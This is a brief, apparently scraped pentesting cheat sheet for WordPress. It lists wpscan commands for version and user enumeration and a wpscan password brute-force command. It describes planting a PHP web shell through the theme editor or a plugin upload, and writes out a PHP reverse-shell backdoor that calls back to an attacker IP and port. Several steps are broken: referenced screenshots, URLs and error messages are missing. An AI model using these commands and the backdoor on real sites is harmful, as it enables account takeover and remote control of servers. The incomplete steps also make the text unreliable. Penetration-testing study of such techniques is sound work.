Identify version

  • Identify the Wordpress CMS version using the tool wpscan: wpscan --url ""

Scan for users

  • Obtain all users of a wordpress by the command: curl | grep name


wpscan --url "" --enumerate u
  • Now bruteforce the username(s) you found by:
wpscan --url "" -U users.txt -P wordlist.txt

Ignore TLS on https webs

  • If you get this error:

  • Add --disable-tls-checks:
wpscan --url "https://URL" --disable-tls-checks

RCEs (as admin logged in)

Panel RCE

Modifying a php from the theme used (admin credentials needed)

Go to Appearance >> Theme Editor >> 404 Template (at the right)

Change the content for a php shell (like Pentest Monkey one)

Search in internet how can you access that updated page. In this case you have to access here:

Plugin RCE

It may be possible to upload .php files as a plugin. Create your php backdoor using for example:

<?php exec("/bin/sh -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'") ?>

Then add a new plugin:

Upload plugin and press Install Now:

Click on Procced:

Probably this wonโ€™t do anything apparently, but if you go to Media, you will see your shell uploaded:

Access it and you will see the URL to execute the reverse shell: